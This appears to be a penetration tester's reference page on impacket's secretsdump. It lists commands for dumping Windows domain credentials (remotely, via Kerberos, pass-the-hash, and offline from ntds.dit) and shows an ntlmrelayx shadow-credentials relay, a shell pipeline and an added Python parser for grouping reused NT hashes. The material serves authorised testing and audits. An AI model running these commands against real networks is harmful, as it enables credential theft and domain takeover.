secretsdump
Dump secrets using a domain account
secretsdump.py domain.com/user VICTIM
Dump secrets using Kerberos
secretsdump.py -k -no-pass VICTIM -debug
Dump secrets using a local admin account
secretsdump.py localhost/administrator@host -hashes x:y
Dump secrets out of an ntds.dit file locally
./secretsdump.py -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL -outputfile MYOUTPUTFILE
Note: don't put a .ntds extension on the end of MYOUTPUTFILE.
Dump secrets out of an ntds.dit file locally (with password history included)
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile customername-dump -history
Note: don't put a .ntds extension on the end of the -outputfile name (customername-dump here).
Parsing a domain's secretsdump outputfile to extract a file with just usernames and hashes while ignoring machine accounts
cat 7MS-DC01_192.168.77.7_2022-12-27_164828.ntds | cut -d ':' -f 1,4 | grep -v '\$' | sed 's/domain.com\\//' | sort
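The same parsing as the cut/grep/sed pipeline above, written as an added Python example (not part of the original notes or of impacket): it reads the DOMAIN\user:rid:lmhash:nthash::: lines of a .ntds outputfile, drops machine accounts, strips the domain prefix, and additionally handles the user_historyN entries that the -history option produces and groups accounts that share an NT hash for a password-reuse audit. The sample input and hash values are constructed.

```python
import re
from collections import defaultdict

# Constructed sample of a secretsdump .ntds outputfile; the hashes are fake placeholders.
SAMPLE_NTDS = """\
domain.com\\Administrator:500:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:11111111111111111111111111111111:::
domain.com\\krbtgt:502:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:22222222222222222222222222222222:::
domain.com\\jdoe:1105:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:11111111111111111111111111111111:::
domain.com\\DC01$:1000:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:33333333333333333333333333333333:::
domain.com\\jdoe_history0:1105:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:44444444444444444444444444444444:::
"""

# Entries written by -history look like user_history0, user_history1, ...
HISTORY_RE = re.compile(r"_history\d+$")


def parse_ntds(text, include_history=False):
    """Return a sorted list of (username, nthash) tuples.

    Mirrors the shell pipeline: field 1 is DOMAIN\\user, field 4 is the NT hash,
    machine accounts (names ending in $) are dropped and the domain prefix is
    removed. History entries are skipped unless include_history is True.
    """
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # blank line or non-hash output
        account, _rid, _lmhash, nthash = parts[:4]
        user = account.split("\\", 1)[-1]  # strip "domain.com\"
        if user.endswith("$"):
            continue  # machine account
        if HISTORY_RE.search(user) and not include_history:
            continue
        rows.append((user, nthash.lower()))
    return sorted(rows)


def shared_hashes(rows):
    """Group usernames by NT hash; a group with more than one user shares a password."""
    by_hash = defaultdict(list)
    for user, nthash in rows:
        by_hash[nthash].append(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    current = parse_ntds(SAMPLE_NTDS)
    for user, nthash in current:
        print(f"{user}:{nthash}")
    print("shared:", shared_hashes(current))
```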
Run secretsdump against a text file full of machines
Check out this script.
Run secretsdump in docker
docker run -it --rm "impacket:latest"
Run with exposed ports
sudo docker run -it --rm -p 80:80 -p 445:445 -p 443:443 "impacket:latest"
/opt/venv/bin # ./ntlmrelayx.py -t ldap://1.2.3.4 --shadow-credentials
Secretsdump references
Here are some articles that are really awesome for understanding secretsdump and its output: